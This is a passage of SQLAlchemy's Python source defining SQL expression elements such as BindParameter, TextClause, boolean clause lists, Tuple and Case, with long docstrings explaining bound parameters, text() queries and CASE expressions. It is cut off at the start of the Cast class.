@util.memoized_property
def anon_label(self):
"""provides a constant 'anonymous label' for this ColumnElement.
This is a label() expression which will be named at compile time.
The same label() is returned each time anon_label is called so
that expressions can reference anon_label multiple times, producing
the same label name at compile time.
the compiler uses this function automatically at compile time
for expressions that are known to be 'unnamed' like binary
expressions and function calls.
"""
while self._is_clone_of is not None:
self = self._is_clone_of
return _anonymous_label(
'%%(%d %s)s' % (id(self), getattr(self, 'name', 'anon'))
)
class BindParameter(ColumnElement):
"""Represent a "bound expression".
:class:`.BindParameter` is invoked explicitly using the
:func:`.bindparam` function, as in::
from sqlalchemy import bindparam
stmt = select([users_table]).\\
where(users_table.c.name == bindparam('username'))
Detailed discussion of how :class:`.BindParameter` is used is
at :func:`.bindparam`.
.. seealso::
:func:`.bindparam`
"""
__visit_name__ = 'bindparam'
_is_crud = False
def __init__(self, key, value=NO_ARG, type_=None,
unique=False, required=NO_ARG,
quote=None, callable_=None,
isoutparam=False,
_compared_to_operator=None,
_compared_to_type=None):
"""Produce a "bound expression".
The return value is an instance of :class:`.BindParameter`; this
is a :class:`.ColumnElement` subclass which represents a so-called
"placeholder" value in a SQL expression, the value of which is
supplied at the point at which the statement in executed against a
database connection.
In SQLAlchemy, the :func:`.bindparam` construct has
the ability to carry along the actual value that will be ultimately
used at expression time. In this way, it serves not just as
a "placeholder" for eventual population, but also as a means of
representing so-called "unsafe" values which should not be rendered
directly in a SQL statement, but rather should be passed along
to the :term:`DBAPI` as values which need to be correctly escaped
and potentially handled for type-safety.
When using :func:`.bindparam` explicitly, the use case is typically
one of traditional deferment of parameters; the :func:`.bindparam`
construct accepts a name which can then be referred to at execution
time::
from sqlalchemy import bindparam
stmt = select([users_table]).\\
where(users_table.c.name == bindparam('username'))
The above statement, when rendered, will produce SQL similar to::
SELECT id, name FROM user WHERE name = :username
In order to populate the value of ``:username`` above, the value
would typically be applied at execution time to a method
like :meth:`.Connection.execute`::
result = connection.execute(stmt, username='wendy')
Explicit use of :func:`.bindparam` is also common when producing
UPDATE or DELETE statements that are to be invoked multiple times,
where the WHERE criterion of the statement is to change on each
invocation, such as::
stmt = (users_table.update().
where(user_table.c.name == bindparam('username')).
values(fullname=bindparam('fullname'))
)
connection.execute(
stmt, [{"username": "wendy", "fullname": "Wendy Smith"},
{"username": "jack", "fullname": "Jack Jones"},
]
)
SQLAlchemy's Core expression system makes wide use of
:func:`.bindparam` in an implicit sense. It is typical that Python
literal values passed to virtually all SQL expression functions are
coerced into fixed :func:`.bindparam` constructs. For example, given
a comparison operation such as::
expr = users_table.c.name == 'Wendy'
The above expression will produce a :class:`.BinaryExpression`
construct, where the left side is the :class:`.Column` object
representing the ``name`` column, and the right side is a
:class:`.BindParameter` representing the literal value::
print(repr(expr.right))
BindParameter('%(4327771088 name)s', 'Wendy', type_=String())
The expression above will render SQL such as::
user.name = :name_1
Where the ``:name_1`` parameter name is an anonymous name. The
actual string ``Wendy`` is not in the rendered string, but is carried
along where it is later used within statement execution. If we
invoke a statement like the following::
stmt = select([users_table]).where(users_table.c.name == 'Wendy')
result = connection.execute(stmt)
We would see SQL logging output as::
SELECT "user".id, "user".name
FROM "user"
WHERE "user".name = %(name_1)s
{'name_1': 'Wendy'}
Above, we see that ``Wendy`` is passed as a parameter to the database,
while the placeholder ``:name_1`` is rendered in the appropriate form
for the target database, in this case the Postgresql database.
Similarly, :func:`.bindparam` is invoked automatically
when working with :term:`CRUD` statements as far as the "VALUES"
portion is concerned. The :func:`.insert` construct produces an
``INSERT`` expression which will, at statement execution time,
generate bound placeholders based on the arguments passed, as in::
stmt = users_table.insert()
result = connection.execute(stmt, name='Wendy')
The above will produce SQL output as::
INSERT INTO "user" (name) VALUES (%(name)s)
{'name': 'Wendy'}
The :class:`.Insert` construct, at compilation/execution time,
rendered a single :func:`.bindparam` mirroring the column
name ``name`` as a result of the single ``name`` parameter
we passed to the :meth:`.Connection.execute` method.
:param key:
the key (e.g. the name) for this bind param.
Will be used in the generated
SQL statement for dialects that use named parameters. This
value may be modified when part of a compilation operation,
if other :class:`BindParameter` objects exist with the same
key, or if its length is too long and truncation is
required.
:param value:
Initial value for this bind param. Will be used at statement
execution time as the value for this parameter passed to the
DBAPI, if no other value is indicated to the statement execution
method for this particular parameter name. Defaults to ``None``.
:param callable\_:
A callable function that takes the place of "value". The function
will be called at statement execution time to determine the
ultimate value. Used for scenarios where the actual bind
value cannot be determined at the point at which the clause
construct is created, but embedded bind values are still desirable.
:param type\_:
A :class:`.TypeEngine` class or instance representing an optional
datatype for this :func:`.bindparam`. If not passed, a type
may be determined automatically for the bind, based on the given
value; for example, trivial Python types such as ``str``,
``int``, ``bool``
may result in the :class:`.String`, :class:`.Integer` or
:class:`.Boolean` types being autoamtically selected.
The type of a :func:`.bindparam` is significant especially in that
the type will apply pre-processing to the value before it is
passed to the database. For example, a :func:`.bindparam` which
refers to a datetime value, and is specified as holding the
:class:`.DateTime` type, may apply conversion needed to the
value (such as stringification on SQLite) before passing the value
to the database.
:param unique:
if True, the key name of this :class:`.BindParameter` will be
modified if another :class:`.BindParameter` of the same name
already has been located within the containing
expression. This flag is used generally by the internals
when producing so-called "anonymous" bound expressions, it
isn't generally applicable to explicitly-named :func:`.bindparam`
constructs.
:param required:
If ``True``, a value is required at execution time. If not passed,
it defaults to ``True`` if neither :paramref:`.bindparam.value`
or :paramref:`.bindparam.callable` were passed. If either of these
parameters are present, then :paramref:`.bindparam.required`
defaults to ``False``.
.. versionchanged:: 0.8 If the ``required`` flag is not specified,
it will be set automatically to ``True`` or ``False`` depending
on whether or not the ``value`` or ``callable`` parameters
were specified.
:param quote:
True if this parameter name requires quoting and is not
currently known as a SQLAlchemy reserved word; this currently
only applies to the Oracle backend, where bound names must
sometimes be quoted.
:param isoutparam:
if True, the parameter should be treated like a stored procedure
"OUT" parameter. This applies to backends such as Oracle which
support OUT parameters.
.. seealso::
:ref:`coretutorial_bind_param`
:ref:`coretutorial_insert_expressions`
:func:`.outparam`
"""
if isinstance(key, ColumnClause):
type_ = key.type
key = key.key
if required is NO_ARG:
required = (value is NO_ARG and callable_ is None)
if value is NO_ARG:
value = None
if quote is not None:
key = quoted_name(key, quote)
if unique:
self.key = _anonymous_label('%%(%d %s)s' % (id(self), key
or 'param'))
else:
self.key = key or _anonymous_label('%%(%d param)s'
% id(self))
# identifying key that won't change across
# clones, used to identify the bind's logical
# identity
self._identifying_key = self.key
# key that was passed in the first place, used to
# generate new keys
self._orig_key = key or 'param'
self.unique = unique
self.value = value
self.callable = callable_
self.isoutparam = isoutparam
self.required = required
if type_ is None:
if _compared_to_type is not None:
self.type = \
_compared_to_type.coerce_compared_value(
_compared_to_operator, value)
else:
self.type = type_api._type_map.get(type(value),
type_api.NULLTYPE)
elif isinstance(type_, type):
self.type = type_()
else:
self.type = type_
def _with_value(self, value):
"""Return a copy of this :class:`.BindParameter` with the given value
set.
"""
cloned = self._clone()
cloned.value = value
cloned.callable = None
cloned.required = False
if cloned.type is type_api.NULLTYPE:
cloned.type = type_api._type_map.get(type(value),
type_api.NULLTYPE)
return cloned
@property
def effective_value(self):
"""Return the value of this bound parameter,
taking into account if the ``callable`` parameter
was set.
The ``callable`` value will be evaluated
and returned if present, else ``value``.
"""
if self.callable:
return self.callable()
else:
return self.value
def _clone(self):
c = ClauseElement._clone(self)
if self.unique:
c.key = _anonymous_label('%%(%d %s)s' % (id(c), c._orig_key
or 'param'))
return c
def _convert_to_unique(self):
if not self.unique:
self.unique = True
self.key = _anonymous_label(
'%%(%d %s)s' % (id(self), self._orig_key or 'param'))
def compare(self, other, **kw):
"""Compare this :class:`BindParameter` to the given
clause."""
return isinstance(other, BindParameter) \
and self.type._compare_type_affinity(other.type) \
and self.value == other.value
def __getstate__(self):
"""execute a deferred value for serialization purposes."""
d = self.__dict__.copy()
v = self.value
if self.callable:
v = self.callable()
d['callable'] = None
d['value'] = v
return d
def __repr__(self):
return 'BindParameter(%r, %r, type_=%r)' % (self.key,
self.value, self.type)
class TypeClause(ClauseElement):
"""Handle a type keyword in a SQL statement.
Used by the ``Case`` statement.
"""
__visit_name__ = 'typeclause'
def __init__(self, type):
self.type = type
class TextClause(Executable, ClauseElement):
"""Represent a literal SQL text fragment.
E.g.::
from sqlalchemy import text
t = text("SELECT * FROM users")
result = connection.execute(t)
The :class:`.Text` construct is produced using the :func:`.text`
function; see that function for full documentation.
.. seealso::
:func:`.text`
"""
__visit_name__ = 'textclause'
_bind_params_regex = re.compile(r'(?<![:\w\x5c]):(\w+)(?!:)', re.UNICODE)
_execution_options = \
Executable._execution_options.union(
{'autocommit': PARSE_AUTOCOMMIT})
@property
def _select_iterable(self):
return (self,)
@property
def selectable(self):
return self
_hide_froms = []
# help in those cases where text() is
# interpreted in a column expression situation
key = _label = _resolve_label = None
_allow_label_resolve = False
def __init__(
self,
text,
bind=None):
self._bind = bind
self._bindparams = {}
def repl(m):
self._bindparams[m.group(1)] = BindParameter(m.group(1))
return ':%s' % m.group(1)
# scan the string and search for bind parameter names, add them
# to the list of bindparams
self.text = self._bind_params_regex.sub(repl, text)
@classmethod
def _create_text(self, text, bind=None, bindparams=None,
typemap=None, autocommit=None):
"""Construct a new :class:`.TextClause` clause, representing
a textual SQL string directly.
E.g.::
from sqlalchemy import text
t = text("SELECT * FROM users")
result = connection.execute(t)
The advantages :func:`.text` provides over a plain string are
backend-neutral support for bind parameters, per-statement
execution options, as well as
bind parameter and result-column typing behavior, allowing
SQLAlchemy type constructs to play a role when executing
a statement that is specified literally. The construct can also
be provided with a ``.c`` collection of column elements, allowing
it to be embedded in other SQL expression constructs as a subquery.
Bind parameters are specified by name, using the format ``:name``.
E.g.::
t = text("SELECT * FROM users WHERE id=:user_id")
result = connection.execute(t, user_id=12)
For SQL statements where a colon is required verbatim, as within
an inline string, use a backslash to escape::
t = text("SELECT * FROM users WHERE name='\\:username'")
The :class:`.TextClause` construct includes methods which can
provide information about the bound parameters as well as the column
values which would be returned from the textual statement, assuming
it's an executable SELECT type of statement. The
:meth:`.TextClause.bindparams` method is used to provide bound
parameter detail, and :meth:`.TextClause.columns` method allows
specification of return columns including names and types::
t = text("SELECT * FROM users WHERE id=:user_id").\\
bindparams(user_id=7).\\
columns(id=Integer, name=String)
for id, name in connection.execute(t):
print(id, name)
The :func:`.text` construct is used internally in cases when
a literal string is specified for part of a larger query, such as
when a string is specified to the :meth:`.Select.where` method of
:class:`.Select`. In those cases, the same
bind parameter syntax is applied::
s = select([users.c.id, users.c.name]).where("id=:user_id")
result = connection.execute(s, user_id=12)
Using :func:`.text` explicitly usually implies the construction
of a full, standalone statement. As such, SQLAlchemy refers
to it as an :class:`.Executable` object, and it supports
the :meth:`Executable.execution_options` method. For example,
a :func:`.text` construct that should be subject to "autocommit"
can be set explicitly so using the
:paramref:`.Connection.execution_options.autocommit` option::
t = text("EXEC my_procedural_thing()").\\
execution_options(autocommit=True)
Note that SQLAlchemy's usual "autocommit" behavior applies to
:func:`.text` constructs implicitly - that is, statements which begin
with a phrase such as ``INSERT``, ``UPDATE``, ``DELETE``,
or a variety of other phrases specific to certain backends, will
be eligible for autocommit if no transaction is in progress.
:param text:
the text of the SQL statement to be created. use ``:<param>``
to specify bind parameters; they will be compiled to their
engine-specific format.
:param autocommit:
Deprecated. Use .execution_options(autocommit=<True|False>)
to set the autocommit option.
:param bind:
an optional connection or engine to be used for this text query.
:param bindparams:
Deprecated. A list of :func:`.bindparam` instances used to
provide information about parameters embedded in the statement.
This argument now invokes the :meth:`.TextClause.bindparams`
method on the construct before returning it. E.g.::
stmt = text("SELECT * FROM table WHERE id=:id",
bindparams=[bindparam('id', value=5, type_=Integer)])
Is equivalent to::
stmt = text("SELECT * FROM table WHERE id=:id").\\
bindparams(bindparam('id', value=5, type_=Integer))
.. deprecated:: 0.9.0 the :meth:`.TextClause.bindparams` method
supersedes the ``bindparams`` argument to :func:`.text`.
:param typemap:
Deprecated. A dictionary mapping the names of columns
represented in the columns clause of a ``SELECT`` statement
to type objects,
which will be used to perform post-processing on columns within
the result set. This parameter now invokes the
:meth:`.TextClause.columns` method, which returns a
:class:`.TextAsFrom` construct that gains a ``.c`` collection and
can be embedded in other expressions. E.g.::
stmt = text("SELECT * FROM table",
typemap={'id': Integer, 'name': String},
)
Is equivalent to::
stmt = text("SELECT * FROM table").columns(id=Integer,
name=String)
Or alternatively::
from sqlalchemy.sql import column
stmt = text("SELECT * FROM table").columns(
column('id', Integer),
column('name', String)
)
.. deprecated:: 0.9.0 the :meth:`.TextClause.columns` method
supersedes the ``typemap`` argument to :func:`.text`.
"""
stmt = TextClause(text, bind=bind)
if bindparams:
stmt = stmt.bindparams(*bindparams)
if typemap:
stmt = stmt.columns(**typemap)
if autocommit is not None:
util.warn_deprecated('autocommit on text() is deprecated. '
'Use .execution_options(autocommit=True)')
stmt = stmt.execution_options(autocommit=autocommit)
return stmt
@_generative
def bindparams(self, *binds, **names_to_values):
"""Establish the values and/or types of bound parameters within
this :class:`.TextClause` construct.
Given a text construct such as::
from sqlalchemy import text
stmt = text("SELECT id, name FROM user WHERE name=:name "
"AND timestamp=:timestamp")
the :meth:`.TextClause.bindparams` method can be used to establish
the initial value of ``:name`` and ``:timestamp``,
using simple keyword arguments::
stmt = stmt.bindparams(name='jack',
timestamp=datetime.datetime(2012, 10, 8, 15, 12, 5))
Where above, new :class:`.BindParameter` objects
will be generated with the names ``name`` and ``timestamp``, and
values of ``jack`` and ``datetime.datetime(2012, 10, 8, 15, 12, 5)``,
respectively. The types will be
inferred from the values given, in this case :class:`.String` and
:class:`.DateTime`.
When specific typing behavior is needed, the positional ``*binds``
argument can be used in which to specify :func:`.bindparam` constructs
directly. These constructs must include at least the ``key``
argument, then an optional value and type::
from sqlalchemy import bindparam
stmt = stmt.bindparams(
bindparam('name', value='jack', type_=String),
bindparam('timestamp', type_=DateTime)
)
Above, we specified the type of :class:`.DateTime` for the
``timestamp`` bind, and the type of :class:`.String` for the ``name``
bind. In the case of ``name`` we also set the default value of
``"jack"``.
Additional bound parameters can be supplied at statement execution
time, e.g.::
result = connection.execute(stmt,
timestamp=datetime.datetime(2012, 10, 8, 15, 12, 5))
The :meth:`.TextClause.bindparams` method can be called repeatedly,
where it will re-use existing :class:`.BindParameter` objects to add
new information. For example, we can call
:meth:`.TextClause.bindparams` first with typing information, and a
second time with value information, and it will be combined::
stmt = text("SELECT id, name FROM user WHERE name=:name "
"AND timestamp=:timestamp")
stmt = stmt.bindparams(
bindparam('name', type_=String),
bindparam('timestamp', type_=DateTime)
)
stmt = stmt.bindparams(
name='jack',
timestamp=datetime.datetime(2012, 10, 8, 15, 12, 5)
)
.. versionadded:: 0.9.0 The :meth:`.TextClause.bindparams` method
supersedes the argument ``bindparams`` passed to
:func:`~.expression.text`.
"""
self._bindparams = new_params = self._bindparams.copy()
for bind in binds:
try:
existing = new_params[bind.key]
except KeyError:
raise exc.ArgumentError(
"This text() construct doesn't define a "
"bound parameter named %r" % bind.key)
else:
new_params[existing.key] = bind
for key, value in names_to_values.items():
try:
existing = new_params[key]
except KeyError:
raise exc.ArgumentError(
"This text() construct doesn't define a "
"bound parameter named %r" % key)
else:
new_params[key] = existing._with_value(value)
@util.dependencies('sqlalchemy.sql.selectable')
def columns(self, selectable, *cols, **types):
"""Turn this :class:`.TextClause` object into a :class:`.TextAsFrom`
object that can be embedded into another statement.
This function essentially bridges the gap between an entirely
textual SELECT statement and the SQL expression language concept
of a "selectable"::
from sqlalchemy.sql import column, text
stmt = text("SELECT id, name FROM some_table")
stmt = stmt.columns(column('id'), column('name')).alias('st')
stmt = select([mytable]).\\
select_from(
mytable.join(stmt, mytable.c.name == stmt.c.name)
).where(stmt.c.id > 5)
Above, we used untyped :func:`.column` elements. These can also have
types specified, which will impact how the column behaves in
expressions as well as determining result set behavior::
stmt = text("SELECT id, name, timestamp FROM some_table")
stmt = stmt.columns(
column('id', Integer),
column('name', Unicode),
column('timestamp', DateTime)
)
for id, name, timestamp in connection.execute(stmt):
print(id, name, timestamp)
Keyword arguments allow just the names and types of columns to be
specified, where the :func:`.column` elements will be generated
automatically::
stmt = text("SELECT id, name, timestamp FROM some_table")
stmt = stmt.columns(
id=Integer,
name=Unicode,
timestamp=DateTime
)
for id, name, timestamp in connection.execute(stmt):
print(id, name, timestamp)
The :meth:`.TextClause.columns` method provides a direct
route to calling :meth:`.FromClause.alias` as well as
:meth:`.SelectBase.cte` against a textual SELECT statement::
stmt = stmt.columns(id=Integer, name=String).cte('st')
stmt = select([sometable]).where(sometable.c.id == stmt.c.id)
.. versionadded:: 0.9.0 :func:`.text` can now be converted into a
fully featured "selectable" construct using the
:meth:`.TextClause.columns` method. This method supersedes the
``typemap`` argument to :func:`.text`.
"""
input_cols = [
ColumnClause(col.key, types.pop(col.key))
if col.key in types
else col
for col in cols
] + [ColumnClause(key, type_) for key, type_ in types.items()]
return selectable.TextAsFrom(self, input_cols)
@property
def type(self):
return type_api.NULLTYPE
@property
def comparator(self):
return self.type.comparator_factory(self)
def self_group(self, against=None):
if against is operators.in_op:
return Grouping(self)
else:
return self
def _copy_internals(self, clone=_clone, **kw):
self._bindparams = dict((b.key, clone(b, **kw))
for b in self._bindparams.values())
def get_children(self, **kwargs):
return list(self._bindparams.values())
def compare(self, other):
return isinstance(other, TextClause) and other.text == self.text
class Null(ColumnElement):
"""Represent the NULL keyword in a SQL statement.
:class:`.Null` is accessed as a constant via the
:func:`.null` function.
"""
__visit_name__ = 'null'
@util.memoized_property
def type(self):
return type_api.NULLTYPE
@classmethod
def _instance(cls):
"""Return a constant :class:`.Null` construct."""
return Null()
def compare(self, other):
return isinstance(other, Null)
class False_(ColumnElement):
"""Represent the ``false`` keyword, or equivalent, in a SQL statement.
:class:`.False_` is accessed as a constant via the
:func:`.false` function.
"""
__visit_name__ = 'false'
@util.memoized_property
def type(self):
return type_api.BOOLEANTYPE
def _negate(self):
return True_()
@classmethod
def _instance(cls):
"""Return a :class:`.False_` construct.
E.g.::
>>> from sqlalchemy import false
>>> print select([t.c.x]).where(false())
SELECT x FROM t WHERE false
A backend which does not support true/false constants will render as
an expression against 1 or 0::
>>> print select([t.c.x]).where(false())
SELECT x FROM t WHERE 0 = 1
The :func:`.true` and :func:`.false` constants also feature
"short circuit" operation within an :func:`.and_` or :func:`.or_`
conjunction::
>>> print select([t.c.x]).where(or_(t.c.x > 5, true()))
SELECT x FROM t WHERE true
>>> print select([t.c.x]).where(and_(t.c.x > 5, false()))
SELECT x FROM t WHERE false
.. versionchanged:: 0.9 :func:`.true` and :func:`.false` feature
better integrated behavior within conjunctions and on dialects
that don't support true/false constants.
.. seealso::
:func:`.true`
"""
return False_()
def compare(self, other):
return isinstance(other, False_)
class True_(ColumnElement):
"""Represent the ``true`` keyword, or equivalent, in a SQL statement.
:class:`.True_` is accessed as a constant via the
:func:`.true` function.
"""
__visit_name__ = 'true'
@util.memoized_property
def type(self):
return type_api.BOOLEANTYPE
def _negate(self):
return False_()
@classmethod
def _ifnone(cls, other):
if other is None:
return cls._instance()
else:
return other
@classmethod
def _instance(cls):
"""Return a constant :class:`.True_` construct.
E.g.::
>>> from sqlalchemy import true
>>> print select([t.c.x]).where(true())
SELECT x FROM t WHERE true
A backend which does not support true/false constants will render as
an expression against 1 or 0::
>>> print select([t.c.x]).where(true())
SELECT x FROM t WHERE 1 = 1
The :func:`.true` and :func:`.false` constants also feature
"short circuit" operation within an :func:`.and_` or :func:`.or_`
conjunction::
>>> print select([t.c.x]).where(or_(t.c.x > 5, true()))
SELECT x FROM t WHERE true
>>> print select([t.c.x]).where(and_(t.c.x > 5, false()))
SELECT x FROM t WHERE false
.. versionchanged:: 0.9 :func:`.true` and :func:`.false` feature
better integrated behavior within conjunctions and on dialects
that don't support true/false constants.
.. seealso::
:func:`.false`
"""
return True_()
def compare(self, other):
return isinstance(other, True_)
class ClauseList(ClauseElement):
"""Describe a list of clauses, separated by an operator.
By default, is comma-separated, such as a column listing.
"""
__visit_name__ = 'clauselist'
def __init__(self, *clauses, **kwargs):
self.operator = kwargs.pop('operator', operators.comma_op)
self.group = kwargs.pop('group', True)
self.group_contents = kwargs.pop('group_contents', True)
text_converter = kwargs.pop(
'_literal_as_text',
_expression_literal_as_text)
if self.group_contents:
self.clauses = [
text_converter(clause).self_group(against=self.operator)
for clause in clauses]
else:
self.clauses = [
text_converter(clause)
for clause in clauses]
def __iter__(self):
return iter(self.clauses)
def __len__(self):
return len(self.clauses)
@property
def _select_iterable(self):
return iter(self)
def append(self, clause):
if self.group_contents:
self.clauses.append(_literal_as_text(clause).
self_group(against=self.operator))
else:
self.clauses.append(_literal_as_text(clause))
def _copy_internals(self, clone=_clone, **kw):
self.clauses = [clone(clause, **kw) for clause in self.clauses]
def get_children(self, **kwargs):
return self.clauses
@property
def _from_objects(self):
return list(itertools.chain(*[c._from_objects for c in self.clauses]))
def self_group(self, against=None):
if self.group and operators.is_precedent(self.operator, against):
return Grouping(self)
else:
return self
def compare(self, other, **kw):
"""Compare this :class:`.ClauseList` to the given :class:`.ClauseList`,
including a comparison of all the clause items.
"""
if not isinstance(other, ClauseList) and len(self.clauses) == 1:
return self.clauses[0].compare(other, **kw)
elif isinstance(other, ClauseList) and \
len(self.clauses) == len(other.clauses):
for i in range(0, len(self.clauses)):
if not self.clauses[i].compare(other.clauses[i], **kw):
return False
else:
return self.operator == other.operator
else:
return False
class BooleanClauseList(ClauseList, ColumnElement):
__visit_name__ = 'clauselist'
def __init__(self, *arg, **kw):
raise NotImplementedError(
"BooleanClauseList has a private constructor")
@classmethod
def _construct(cls, operator, continue_on, skip_on, *clauses, **kw):
convert_clauses = []
clauses = [
_expression_literal_as_text(clause)
for clause in
util.coerce_generator_arg(clauses)
]
for clause in clauses:
if isinstance(clause, continue_on):
continue
elif isinstance(clause, skip_on):
return clause.self_group(against=operators._asbool)
convert_clauses.append(clause)
if len(convert_clauses) == 1:
return convert_clauses[0].self_group(against=operators._asbool)
elif not convert_clauses and clauses:
return clauses[0].self_group(against=operators._asbool)
convert_clauses = [c.self_group(against=operator)
for c in convert_clauses]
self = cls.__new__(cls)
self.clauses = convert_clauses
self.group = True
self.operator = operator
self.group_contents = True
self.type = type_api.BOOLEANTYPE
return self
@classmethod
def and_(cls, *clauses):
"""Produce a conjunction of expressions joined by ``AND``.
E.g.::
from sqlalchemy import and_
stmt = select([users_table]).where(
and_(
users_table.c.name == 'wendy',
users_table.c.enrolled == True
)
)
The :func:`.and_` conjunction is also available using the
Python ``&`` operator (though note that compound expressions
need to be parenthesized in order to function with Python
operator precedence behavior)::
stmt = select([users_table]).where(
(users_table.c.name == 'wendy') &
(users_table.c.enrolled == True)
)
The :func:`.and_` operation is also implicit in some cases;
the :meth:`.Select.where` method for example can be invoked multiple
times against a statement, which will have the effect of each
clause being combined using :func:`.and_`::
stmt = select([users_table]).\\
where(users_table.c.name == 'wendy').\\
where(users_table.c.enrolled == True)
.. seealso::
:func:`.or_`
"""
return cls._construct(operators.and_, True_, False_, *clauses)
@classmethod
def or_(cls, *clauses):
"""Produce a conjunction of expressions joined by ``OR``.
E.g.::
from sqlalchemy import or_
stmt = select([users_table]).where(
or_(
users_table.c.name == 'wendy',
users_table.c.name == 'jack'
)
)
The :func:`.or_` conjunction is also available using the
Python ``|`` operator (though note that compound expressions
need to be parenthesized in order to function with Python
operator precedence behavior)::
stmt = select([users_table]).where(
(users_table.c.name == 'wendy') |
(users_table.c.name == 'jack')
)
.. seealso::
:func:`.and_`
"""
return cls._construct(operators.or_, False_, True_, *clauses)
@property
def _select_iterable(self):
return (self, )
def self_group(self, against=None):
if not self.clauses:
return self
else:
return super(BooleanClauseList, self).self_group(against=against)
def _negate(self):
return ClauseList._negate(self)
and_ = BooleanClauseList.and_
or_ = BooleanClauseList.or_
class Tuple(ClauseList, ColumnElement):
"""Represent a SQL tuple."""
def __init__(self, *clauses, **kw):
"""Return a :class:`.Tuple`.
Main usage is to produce a composite IN construct::
from sqlalchemy import tuple_
tuple_(table.c.col1, table.c.col2).in_(
[(1, 2), (5, 12), (10, 19)]
)
.. warning::
The composite IN construct is not supported by all backends,
and is currently known to work on Postgresql and MySQL,
but not SQLite. Unsupported backends will raise
a subclass of :class:`~sqlalchemy.exc.DBAPIError` when such
an expression is invoked.
"""
clauses = [_literal_as_binds(c) for c in clauses]
self._type_tuple = [arg.type for arg in clauses]
self.type = kw.pop('type_', self._type_tuple[0]
if self._type_tuple else type_api.NULLTYPE)
super(Tuple, self).__init__(*clauses, **kw)
@property
def _select_iterable(self):
return (self, )
def _bind_param(self, operator, obj):
return Tuple(*[
BindParameter(None, o, _compared_to_operator=operator,
_compared_to_type=type_, unique=True)
for o, type_ in zip(obj, self._type_tuple)
]).self_group()
class Case(ColumnElement):
"""Represent a ``CASE`` expression.
:class:`.Case` is produced using the :func:`.case` factory function,
as in::
from sqlalchemy import case
stmt = select([users_table]).\\
where(
case(
[
(users_table.c.name == 'wendy', 'W'),
(users_table.c.name == 'jack', 'J')
],
else_='E'
)
)
Details on :class:`.Case` usage is at :func:`.case`.
.. seealso::
:func:`.case`
"""
__visit_name__ = 'case'
def __init__(self, whens, value=None, else_=None):
"""Produce a ``CASE`` expression.
The ``CASE`` construct in SQL is a conditional object that
acts somewhat analogously to an "if/then" construct in other
languages. It returns an instance of :class:`.Case`.
:func:`.case` in its usual form is passed a list of "when"
constructs, that is, a list of conditions and results as tuples::
from sqlalchemy import case
stmt = select([users_table]).\\
where(
case(
[
(users_table.c.name == 'wendy', 'W'),
(users_table.c.name == 'jack', 'J')
],
else_='E'
)
)
The above statement will produce SQL resembling::
SELECT id, name FROM user
WHERE CASE
WHEN (name = :name_1) THEN :param_1
WHEN (name = :name_2) THEN :param_2
ELSE :param_3
END
When simple equality expressions of several values against a single
parent column are needed, :func:`.case` also has a "shorthand" format
used via the
:paramref:`.case.value` parameter, which is passed a column
expression to be compared. In this form, the :paramref:`.case.whens`
parameter is passed as a dictionary containing expressions to be
compared against keyed to result expressions. The statement below is
equivalent to the preceding statement::
stmt = select([users_table]).\\
where(
case(
{"wendy": "W", "jack": "J"},
value=users_table.c.name,
else_='E'
)
)
The values which are accepted as result values in
:paramref:`.case.whens` as well as with :paramref:`.case.else_` are
coerced from Python literals into :func:`.bindparam` constructs.
SQL expressions, e.g. :class:`.ColumnElement` constructs, are accepted
as well. To coerce a literal string expression into a constant
expression rendered inline, use the :func:`.literal_column` construct,
as in::
from sqlalchemy import case, literal_column
case(
[
(
orderline.c.qty > 100,
literal_column("'greaterthan100'")
),
(
orderline.c.qty > 10,
literal_column("'greaterthan10'")
)
],
else_=literal_column("'lessthan10'")
)
The above will render the given constants without using bound
parameters for the result values (but still for the comparison
values), as in::
CASE
WHEN (orderline.qty > :qty_1) THEN 'greaterthan100'
WHEN (orderline.qty > :qty_2) THEN 'greaterthan10'
ELSE 'lessthan10'
END
:param whens: The criteria to be compared against,
:paramref:`.case.whens` accepts two different forms, based on
whether or not :paramref:`.case.value` is used.
In the first form, it accepts a list of 2-tuples; each 2-tuple
consists of ``(<sql expression>, <value>)``, where the SQL
expression is a boolean expression and "value" is a resulting value,
e.g.::
case([
(users_table.c.name == 'wendy', 'W'),
(users_table.c.name == 'jack', 'J')
])
In the second form, it accepts a Python dictionary of comparison
values mapped to a resulting value; this form requires
:paramref:`.case.value` to be present, and values will be compared
using the ``==`` operator, e.g.::
case(
{"wendy": "W", "jack": "J"},
value=users_table.c.name
)
:param value: An optional SQL expression which will be used as a
fixed "comparison point" for candidate values within a dictionary
passed to :paramref:`.case.whens`.
:param else\_: An optional SQL expression which will be the evaluated
result of the ``CASE`` construct if all expressions within
:paramref:`.case.whens` evaluate to false. When omitted, most
databases will produce a result of NULL if none of the "when"
expressions evaluate to true.
"""
try:
whens = util.dictlike_iteritems(whens)
except TypeError:
pass
if value is not None:
whenlist = [
(_literal_as_binds(c).self_group(),
_literal_as_binds(r)) for (c, r) in whens
]
else:
whenlist = [
(_no_literals(c).self_group(),
_literal_as_binds(r)) for (c, r) in whens
]
if whenlist:
type_ = list(whenlist[-1])[-1].type
else:
type_ = None
if value is None:
self.value = None
else:
self.value = _literal_as_binds(value)
self.type = type_
self.whens = whenlist
if else_ is not None:
self.else_ = _literal_as_binds(else_)
else:
self.else_ = None
def _copy_internals(self, clone=_clone, **kw):
if self.value is not None:
self.value = clone(self.value, **kw)
self.whens = [(clone(x, **kw), clone(y, **kw))
for x, y in self.whens]
if self.else_ is not None:
self.else_ = clone(self.else_, **kw)
def get_children(self, **kwargs):
if self.value is not None:
yield self.value
for x, y in self.whens:
yield x
yield y
if self.else_ is not None:
yield self.else_
@property
def _from_objects(self):
return list(itertools.chain(*[x._from_objects for x in
self.get_children()]))
def literal_column(text, type_=None):
"""Produce a :class:`.ColumnClause` object that has the
:paramref:`.column.is_literal` flag set to True.
:func:`.literal_column` is similar to :func:`.column`, except that
it is more often used as a "standalone" column expression that renders
exactly as stated; while :func:`.column` stores a string name that
will be assumed to be part of a table and may be quoted as such,
:func:`.literal_column` can be that, or any other arbitrary column-oriented
expression.
:param text: the text of the expression; can be any SQL expression.
Quoting rules will not be applied. To specify a column-name expression
which should be subject to quoting rules, use the :func:`column`
function.
:param type\_: an optional :class:`~sqlalchemy.types.TypeEngine`
object which will
provide result-set translation and additional expression semantics for
this column. If left as None the type will be NullType.
.. seealso::
:func:`.column`
:func:`.text`
:ref:`sqlexpression_literal_column`
"""
return ColumnClause(text, type_=type_, is_literal=True)
class Cast(ColumnElement):
"""Represent a ``CAST`` expression.
:class:`.Cast` is produced using the :func:`.cast` factory function,
as in::
from sqlalchemy import cast, Numeric
stmt = select([
cast(product_table.c.unit_price, Numeric(10, 4))
])
